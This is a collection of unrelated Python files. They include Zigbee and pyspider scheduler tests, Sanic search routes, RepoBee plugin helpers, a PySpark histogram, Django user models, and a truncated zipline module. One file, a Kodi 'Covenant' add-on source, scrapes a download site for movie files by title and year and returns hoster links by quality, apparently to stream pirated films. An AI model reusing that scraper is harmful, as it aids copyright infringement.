"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x00, zcl_f.Status.SUCCESS]),
):
# turn on via UI
await hass.services.async_call(
DOMAIN, "turn_on", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, ON, (), expect_reply=True, manufacturer=None
)
# turn off from HA
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x01, zcl_f.Status.SUCCESS]),
):
# turn off via UI
await hass.services.async_call(
DOMAIN, "turn_off", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, OFF, (), expect_reply=True, manufacturer=None
)
# test joining a new switch to the network and HA
cluster.bind.reset_mock()
cluster.configure_reporting.reset_mock()
await zha_gateway.async_device_initialized(zigpy_device)
await hass.async_block_till_done()
assert cluster.bind.call_count == 1
assert cluster.bind.await_count == 1
assert cluster.configure_reporting.call_count == 1
assert cluster.configure_reporting.await_count == 1
|
"""
This file contains all routes for the /search API
"""
from sanic import Blueprint
from sanic.response import HTTPResponse
from dp4py_sanic.api.response.json_response import json
from dp_conceptual_search.config import CONFIG
from dp_conceptual_search.api.request import ONSRequest
from dp_conceptual_search.ons.search.index import Index
from dp_conceptual_search.ons.search.client.search_engine import SearchEngine
from dp_conceptual_search.ons.search.response.search_result import SearchResult
from dp_conceptual_search.api.search.sanic_search_engine import SanicSearchEngine
from dp_conceptual_search.api.search.conceptual import routes as conceptual_routes
search_blueprint = Blueprint('search', url_prefix='/search')
@search_blueprint.route('/departments', methods=['GET'], strict_slashes=True)
async def ons_departments_query(request: ONSRequest) -> HTTPResponse:
"""
Handles departments queries to the departments index
:param request:
:return:
"""
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.DEPARTMENTS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.departments_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/', methods=['GET', 'POST'], strict_slashes=False)
async def search(request: ONSRequest) -> HTTPResponse:
"""
API which combines the content, counts and featured result queries into one
:param request:
:return:
"""
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.search(request)
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
result = await sanic_search_engine.search(request)
return json(request, result, 200)
@search_blueprint.route('/content', methods=['GET', 'POST'], strict_slashes=True)
async def ons_content_query(request: ONSRequest) -> HTTPResponse:
"""
Handles content queries to the API.
:param request:
:return:
"""
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_content_query(request)
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.content_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/counts', methods=['GET', 'POST'], strict_slashes=True)
async def ons_counts_query(request: ONSRequest) -> HTTPResponse:
"""
Handles type counts queries to the API.
:param request:
:return:
"""
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_counts_query(request)
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.type_counts_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/featured', methods=['GET'], strict_slashes=True)
async def ons_featured_result_query(request: ONSRequest) -> HTTPResponse:
"""
Handles featured result queries (i.e product and home page census pages)
:param request:
:return:
"""
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.featured_result_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/uri/', methods=['GET', 'POST'])
@search_blueprint.route('/uri/<path:path>', methods=['GET', 'POST'])
async def search_by_uri(request: ONSRequest, path: str):
"""
Search for a page by its URI
:param request:
:param path:
:return:
"""
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.search_by_uri(request, path)
return json(request, search_result.to_dict(), 200)
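# Example requests handled by this blueprint (a sketch; the host/port and the
# accepted query parameters depend on the app and SearchEngine configuration):
#
#   GET /search/departments?q=census
#   GET /search/content?q=inflation
#   GET /search/uri/economy/inflationandpriceindices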
|
# -*- coding: UTF-8 -*-
from common_utils.new_log import NewLog
class LogDecorator:
log = NewLog(__name__)
logger = log.get_log()
def __call__(self, func):
def wrapper(*args, **kw):
self.logger.debug("call method %s ===============" % func.__name__)
self.logger.debug("method [%s] input args: [%s], kw: [%s]" % (func.__name__, args, kw))
result = func(*args, **kw)
self.logger.debug("method [%s] response: [%s]" % (func.__name__, result))
return result
return wrapper
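# Usage sketch (hypothetical function, not part of this module):
#
# @LogDecorator()
# def add(a, b):
#     return a + b
#
# add(1, 2)  # logs the call, its args/kwargs and the result at DEBUG level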
|
# -*- coding: utf-8 -*-
'''
Covenant Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser2
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['ultrahdindir.com']
self.base_link = 'http://ultrahdindir.com'
self.post_link = '/index.php?do=search'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url is None: return sources
if debrid.status() is False: raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['title'].replace(':','').lower()
year = data['year']
query = '%s %s' % (data['title'], data['year'])
query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
url = urlparse.urljoin(self.base_link, self.post_link)
post = 'do=search&subaction=search&search_start=0&full_search=0&result_from=1&story=%s' % urllib.quote_plus(query)
r = client.request(url, post=post)
r = client.parseDOM(r, 'div', attrs={'class': 'box-out margin'})
r = [(dom_parser2.parse_dom(i, 'div', attrs={'class':'news-title'})) for i in r if data['imdb'] in i]
r = [(dom_parser2.parse_dom(i[0], 'a', req='href')) for i in r if i]
r = [(i[0].attrs['href'], i[0].content) for i in r if i]
hostDict = hostprDict + hostDict
for item in r:
try:
name = item[1]
y = re.findall('\((\d{4})\)', name)[0]
if not y == year: raise Exception()
s = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', name)
s = s[0] if s else '0'
data = client.request(item[0])
data = dom_parser2.parse_dom(data, 'div', attrs={'id': 'r-content'})
data = re.findall('\s*<b><a href=.+?>(.+?)</b>.+?<u><b><a href="(.+?)".+?</a></b></u>',
data[0].content, re.DOTALL)
u = [(i[0], i[1], s) for i in data if i]
for name, url, size in u:
try:
if '4K' in name:
quality = '4K'
elif '1080p' in name:
quality = '1080p'
elif '720p' in name:
quality = '720p'
elif any(i in name for i in ['dvdscr', 'r5', 'r6']):
quality = 'SCR'
elif any(i in name for i in
['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts']):
quality = 'CAM'
else: quality = '720p'
info = []
if '3D' in name or '.3D.' in url: info.append('3D'); quality = '1080p'
if any(i in name for i in ['hevc', 'h265', 'x265']): info.append('HEVC')
try:
size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', size)[-1]
div = 1 if size.endswith(('Gb', 'GiB', 'GB')) else 1024
size = float(re.sub('[^0-9|/.|/,]', '', size)) / div
size = '%.2f GB' % size
info.append(size)
except:
pass
info = ' | '.join(info)
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
if any(x in url for x in ['.rar', '.zip', '.iso', 'turk']):continue
if 'ftp' in url: host = 'COV'; direct = True
else: direct = False; host = 'turbobit.net'
#if not host in hostDict: continue
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'language': 'en',
'url': url, 'info': info, 'direct': direct, 'debridonly': True})
except:
pass
except:
pass
return sources
except:
return sources
def resolve(self, url):
return url
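# Shape sketch of one entry appended to `sources` above (illustrative values):
#
# {'source': 'turbobit.net', 'quality': '1080p', 'language': 'en',
#  'url': 'http://...', 'info': 'HEVC | 4.50 GB', 'direct': False,
#  'debridonly': True}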
|
"""Helper functions for the distribution."""
import importlib
import json
import pathlib
import subprocess
import sys
import types
import os
from typing import Optional, List
import requests
import repobee_plug as plug
import _repobee.ext
from _repobee import distinfo
from _repobee import plugin
class DependencyResolutionError(plug.PlugError):
"""Raise when dependency resolution fails during an install."""
def get_installed_plugins_path() -> pathlib.Path:
"""Return the path to the installed_plugins.json file."""
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "installed_plugins.json"
def get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> dict:
"""Return the public content of the installed_plugins.json file."""
installed_plugins = _get_installed_plugins(installed_plugins_path)
if "_metainfo" in installed_plugins:
del installed_plugins["_metainfo"]
return installed_plugins
def _get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
):
"""Return the content of the installed_plugins.json file, with metainfo."""
return json.loads(
(installed_plugins_path or get_installed_plugins_path()).read_text(
"utf8"
)
)
def write_installed_plugins(
installed_plugins: dict,
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
"""Write the installed_plugins.json file."""
path = installed_plugins_path or get_installed_plugins_path()
metainfo = _get_installed_plugins(path).get("_metainfo") or {}
metainfo.update(installed_plugins.get("_metainfo") or {})
installed_plugins_write = dict(installed_plugins)
installed_plugins_write["_metainfo"] = metainfo
path.write_text(
json.dumps(installed_plugins_write, indent=4), encoding="utf8"
)
def get_active_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> List[str]:
"""Read active plugins from the installed_plugins.json file."""
installed_plugins = _get_installed_plugins(installed_plugins_path)
return (installed_plugins.get("_metainfo") or {}).get(
"active_plugins"
) or []
def write_active_plugins(
active_plugins: List[str],
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
"""Write the active plugins."""
installed_plugins = _get_installed_plugins(installed_plugins_path)
installed_plugins.setdefault("_metainfo", {})[
"active_plugins"
] = active_plugins
write_installed_plugins(installed_plugins, installed_plugins_path)
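# Shape sketch of installed_plugins.json as read and written above
# (illustrative plugin name and fields):
#
# {
#     "junit4": {"version": "v1.0.0"},
#     "_metainfo": {"active_plugins": ["junit4"]}
# }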
def get_pip_path() -> pathlib.Path:
"""Return the path to the installed pip binary."""
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "env" / "bin" / "pip"
def get_plugins_json(url: str = "https://repobee.org/plugins.json") -> dict:
"""Fetch and parse the plugins.json file.
Args:
url: URL to the plugins.json file.
Returns:
A dictionary with the contents of the plugins.json file.
"""
resp = requests.get(url)
if resp.status_code != 200:
plug.log.error(resp.content.decode("utf8"))
raise plug.PlugError(f"could not fetch plugins.json from '{url}'")
return resp.json()
def get_builtin_plugins(ext_pkg: types.ModuleType = _repobee.ext) -> dict:
"""Returns a dictionary of builting plugins on the same form as the
plugins.json dict.
"""
def _get_plugin_description(name):
return (
importlib.import_module(f"{ext_pkg.__name__}.{name}").__dict__.get(
"PLUGIN_DESCRIPTION"
)
or "-"
)
return {
name: dict(
description=_get_plugin_description(name),
url=f"https://repobee.readthedocs.io/"
f"en/stable/builtins.html#{name}",
versions={"N/A": {}},
builtin=True,
)
for name in plugin.get_module_names(ext_pkg)
}
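# Shape sketch of one returned entry (illustrative plugin name and
# description):
#
# {
#     "pairwise": {
#         "description": "...",
#         "url": "https://repobee.readthedocs.io/en/stable/builtins.html#pairwise",
#         "versions": {"N/A": {}},
#         "builtin": True,
#     }
# }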
def pip(command: str, *args, **kwargs) -> subprocess.CompletedProcess:
"""Thin wrapper around the ``pip`` executable in the distribution's virtual
environment.
Args:
command: The command to execute (e.g. "install" or "list").
args: Positional arguments to ``pip``, passed in order. Flags should
also be passed here (e.g. `--pre`)
kwargs: Keyword arguments to ``pip``, passed as ``--key value`` to the
CLI. If the value is ``True``, the argument is passed as a flag,
i.e. as ``--key``.
Returns:
The completed ``pip`` process.
Raises:
DependencyResolutionError: If the 2020-resolver fails to
resolve dependencies.
"""
cli_kwargs = [
f"--{key.replace('_', '-')}"
# True is interpreted as a flag
+ (f"={val}" if val is not True else "")
for key, val in kwargs.items()
]
env = dict(os.environ)
if command == "install":
# the resolver allows us to avoid installing plugins that are
# incompatible with the current version of RepoBee
cli_kwargs.append("--use-feature=2020-resolver")
# REPOBEE_INSTALL_DIR must be available when upgrading RepoBee,
# or the dist plugins aren't activated
env["REPOBEE_INSTALL_DIR"] = str(distinfo.INSTALL_DIR)
# due to the hack in setup.py to edit the distinfo, we must build
# RepoBee from source
cli_kwargs.append("--no-binary=repobee")
cmd = [str(get_pip_path()), command, *args, *cli_kwargs]
proc = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env
)
if proc.returncode != 0:
stderr = proc.stderr.decode(sys.getdefaultencoding())
plug.log.error(stderr)
if "ResolutionImpossible" in stderr:
raise DependencyResolutionError()
return proc
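# Example (hypothetical plugin distribution name): keyword arguments are
# rendered as CLI options, so ``no_cache_dir=True`` becomes ``--no-cache-dir``.
#
# proc = pip("install", "repobee-junit4", no_cache_dir=True)
# if proc.returncode != 0:
#     raise plug.PlugError("plugin installation failed")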
|
from pyspark import SparkConf, SparkContext
import collections
conf = SparkConf().setMaster("local").setAppName("RatingsHistogram")
sc = SparkContext(conf = conf)
lines = sc.textFile("D:/celebal/resources/ml-100k/u.data")
ratings = lines.map(lambda x: x.split()[2])
result = ratings.countByValue()
sortedResults = collections.OrderedDict(sorted(result.items()))
for key, value in sortedResults.items():
print("%s %i" % (key, value))
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-08 22:37:13
import os
import time
import shutil
import unittest2 as unittest
import logging
import logging.config
logging.config.fileConfig("pyspider/logging.conf")
from pyspider.scheduler.task_queue import TaskQueue
class TestTaskQueue(unittest.TestCase):
@classmethod
def setUpClass(self):
self.task_queue = TaskQueue()
self.task_queue.rate = 100000
self.task_queue.burst = 100000
self.task_queue.processing_timeout = 0.5
def test_10_put(self):
self.task_queue.put('a3', 0, time.time() + 0.5)
self.task_queue.put('a4', 3, time.time() + 0.2)
self.task_queue.put('a2', 0)
self.task_queue.put('a1', 1)
self.assertEqual(self.task_queue.size(), 4)
def test_20_update(self):
self.task_queue.put('a2', 4)
self.assertEqual(self.task_queue.size(), 4)
self.task_queue.put('a3', 2, 0)
self.assertEqual(self.task_queue.size(), 4)
def test_30_get_from_priority_queue(self):
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(self.task_queue.size(), 4)
def test_40_time_queue_1(self):
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.size(), 4)
def test_50_time_queue_2(self):
time.sleep(0.3)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(self.task_queue.size(), 4)
def test_60_processing_queue(self):
time.sleep(0.5)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(len(self.task_queue), 4)
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(len(self.task_queue), 4)
def test_70_done(self):
self.assertTrue(self.task_queue.done('a2'))
self.assertTrue(self.task_queue.done('a1'))
self.assertEqual(len(self.task_queue), 2)
self.assertTrue(self.task_queue.done('a4'))
self.assertTrue(self.task_queue.done('a3'))
self.assertEqual(len(self.task_queue), 0)
from pyspider.scheduler.token_bucket import Bucket
class TestBucket(unittest.TestCase):
def test_bucket(self):
bucket = Bucket(100, 1000)
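# Reading of the assertions below (the argument semantics are an assumption
# inferred from the expected values): the bucket refills at ~100 tokens/s up
# to a cap of 1000, so after desc(100) drops the level to 900, each 0.1 s
# sleep restores roughly 10 tokens.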
self.assertEqual(bucket.get(), 1000)
time.sleep(0.1)
self.assertEqual(bucket.get(), 1000)
bucket.desc(100)
self.assertEqual(bucket.get(), 900)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 910, delta=2)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 920, delta=2)
try:
from six.moves import xmlrpc_client
except ImportError:
import xmlrpclib as xmlrpc_client
from pyspider.scheduler.scheduler import Scheduler
from pyspider.database.sqlite import taskdb, projectdb, resultdb
from pyspider.libs.multiprocessing_queue import Queue
from pyspider.libs.utils import run_in_thread
class TestScheduler(unittest.TestCase):
taskdb_path = './data/tests/task.db'
projectdb_path = './data/tests/project.db'
resultdb_path = './data/tests/result.db'
check_project_time = 1
scheduler_xmlrpc_port = 23333
@classmethod
def setUpClass(self):
shutil.rmtree('./data/tests', ignore_errors=True)
os.makedirs('./data/tests')
def get_taskdb():
return taskdb.TaskDB(self.taskdb_path)
self.taskdb = get_taskdb()
def get_projectdb():
return projectdb.ProjectDB(self.projectdb_path)
self.projectdb = get_projectdb()
def get_resultdb():
return resultdb.ResultDB(self.resultdb_path)
self.resultdb = get_resultdb()
self.newtask_queue = Queue(10)
self.status_queue = Queue(10)
self.scheduler2fetcher = Queue(10)
self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' % self.scheduler_xmlrpc_port)
def run_scheduler():
scheduler = Scheduler(taskdb=get_taskdb(), projectdb=get_projectdb(),
newtask_queue=self.newtask_queue, status_queue=self.status_queue,
out_queue=self.scheduler2fetcher, data_path="./data/tests/",
resultdb=get_resultdb())
scheduler.UPDATE_PROJECT_INTERVAL = 0.1
scheduler.LOOP_INTERVAL = 0.1
scheduler.INQUEUE_LIMIT = 10
scheduler.DELETE_TIME = 0
scheduler.DEFAULT_RETRY_DELAY = {'': 5}
scheduler._last_tick = int(time.time()) # not dispatch cronjob
run_in_thread(scheduler.xmlrpc_run, port=self.scheduler_xmlrpc_port)
scheduler.run()
self.process = run_in_thread(run_scheduler)
time.sleep(1)
@classmethod
def tearDownClass(self):
if self.process.is_alive():
self.rpc._quit()
self.process.join(5)
assert not self.process.is_alive()
shutil.rmtree('./data/tests', ignore_errors=True)
time.sleep(1)
def test_10_new_task_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
self.assertEqual(self.rpc.size(), 0)
self.assertEqual(len(self.rpc.get_active_tasks()), 0)
def test_20_new_project(self):
self.projectdb.insert('test_project', {
'name': 'test_project',
'group': 'group',
'status': 'TODO',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
def test_30_update_project(self):
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=1)
self.projectdb.update('test_project', status="DEBUG")
time.sleep(0.1)
self.rpc.update_project()
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.assertEqual(task['url'], 'data:,_on_get_info')
def test_34_new_not_used_project(self):
self.projectdb.insert('test_project_not_started', {
'name': 'test_project_not_started',
'group': 'group',
'status': 'RUNNING',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
task = self.scheduler2fetcher.get(timeout=1)
self.assertEqual(task['taskid'], '_on_get_info')
def test_35_new_task(self):
time.sleep(0.2)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
},
})
time.sleep(0.5)
task = self.scheduler2fetcher.get(timeout=10)
self.assertGreater(len(self.rpc.get_active_tasks()), 0)
self.assertIsNotNone(task)
self.assertEqual(task['project'], 'test_project')
self.assertIn('schedule', task)
self.assertIn('fetch', task)
self.assertIn('process', task)
self.assertIn('track', task)
self.assertEqual(task['fetch']['data'], 'abc')
def test_37_force_update_processing_task(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url_force_update',
'schedule': {
'age': 10,
'force_update': True,
},
})
time.sleep(0.2)
# it should not block the next test
def test_40_taskdone_error_no_project(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'no_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_50_taskdone_error_no_track(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {}
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_60_taskdone_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=4)
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
def test_70_taskdone_ok(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
time.sleep(0.2)
self.assertEqual(self.rpc.size(), 0)
def test_80_newtask_age_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_82_newtask_via_rpc(self):
self.rpc.newtask({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_90_newtask_with_itag(self):
time.sleep(0.1)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'itag': "abc",
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.test_70_taskdone_ok()
def test_a10_newtask_restart_by_age(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a20_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': False
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_a30_task_verify(self):
self.assertFalse(self.rpc.newtask({
#'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
#'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
#'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'not_exist_project',
'url': 'url',
}))
self.assertTrue(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
def test_a40_success_recrawl(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a50_failed_recrawl(self):
for i in range(3):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a60_disable_recrawl(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_x10_inqueue_limit(self):
self.projectdb.insert('test_inqueue_project', {
'name': 'test_inqueue_project',
'group': 'group',
'status': 'DEBUG',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 0,
'burst': 0,
})
time.sleep(0.1)
pre_size = self.rpc.size()
for i in range(20):
self.newtask_queue.put({
'taskid': 'taskid%d' % i,
'project': 'test_inqueue_project',
'url': 'url',
'schedule': {
'age': 3000,
'force_update': True,
},
})
time.sleep(1)
self.assertEqual(self.rpc.size() - pre_size, 10)
def test_x20_delete_project(self):
self.assertIsNotNone(self.projectdb.get('test_inqueue_project'))
#self.assertIsNotNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
self.projectdb.update('test_inqueue_project', status="STOP", group="lock,delete")
time.sleep(1)
self.assertIsNone(self.projectdb.get('test_inqueue_project'))
self.taskdb._list_project()
self.assertIsNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
def test_z10_startup(self):
self.assertTrue(self.process.is_alive())
def test_z20_quit(self):
self.rpc._quit()
time.sleep(0.2)
self.assertFalse(self.process.is_alive())
self.assertEqual(
self.taskdb.get_task('test_project', 'taskid')['status'],
self.taskdb.SUCCESS
)
if __name__ == '__main__':
unittest.main()
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
class UserProfileManager(BaseUserManager):
"""Manager for user profiles"""
def create_user(self, email, name, password=None):
"""create a new user profile"""
if not email:
raise ValueError("User must have and email address")
email = self.normalize_email(email)
user = self.model(email=email, name=name)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, name, password):
"""create and save new superuser with given details"""
user = self.create_user(email, name, password)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser, PermissionsMixin):
"""Database model for users in the system"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserProfileManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name']
def get_full_name(self):
"""Retrieve full name of user"""
return self.name
def get_short_name(self):
"""Retrieve short name of user"""
return self.name
def __str__(self):
"""Return string representation of our user"""
return self.email
class ProfileFeedItem(models.Model):
"""Profile status update"""
user_profile = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
status_text = models.CharField(max_length=255)
created_on = models.DateTimeField(auto_now_add=True)
def __str__(self):
"""Retusnt the model as a string"""
return self.status_text
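# A hedged usage sketch of the manager above (emails and names are
# hypothetical; typically exercised from a test or shell, not at import
# time):
#
#     user = UserProfile.objects.create_user(
#         email='jane@example.com', name='Jane', password='s3cret')
#     admin = UserProfile.objects.create_superuser(
#         email='admin@example.com', name='Admin', password='s3cret')
#     assert admin.is_staff and admin.is_superuser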
|
"""
factor.py
"""
from functools import wraps
from operator import attrgetter
from numbers import Number
from numpy import inf, where
from toolz import curry
from zipline.errors import UnknownRankMethod
from zipline.lib.normalize import naive_grouped_rowwise_apply
from zipline.lib.rank import masked_rankdata_2d
from zipline.pipeline.classifiers import Classifier, Everything, Quantiles
from zipline.pipeline.mixins import (
CustomTermMixin,
LatestMixin,
PositiveWindowLengthMixin,
RestrictedDTypeMixin,
SingleInputMixin,
)
from zipline.pipeline.term import (
ComputableTerm,
NotSpecified,
NotSpecifiedType,
Term,
)
from zipline.pipeline.expression import (
BadBinaryOperator,
COMPARISONS,
is_comparison,
MATH_BINOPS,
method_name_for_op,
NumericalExpression,
NUMEXPR_MATH_FUNCS,
UNARY_OPS,
unary_op_name,
)
from zipline.pipeline.filters import (
Filter,
NumExprFilter,
PercentileFilter,
NullFilter,
)
from zipline.utils.input_validation import expect_types
from zipline.utils.math_utils import nanmean, nanstd
from zipline.utils.numpy_utils import (
bool_dtype,
coerce_to_dtype,
datetime64ns_dtype,
float64_dtype,
int64_dtype,
)
from zipline.utils.preprocess import preprocess
_RANK_METHODS = frozenset(['average', 'min', 'max', 'dense', 'ordinal'])
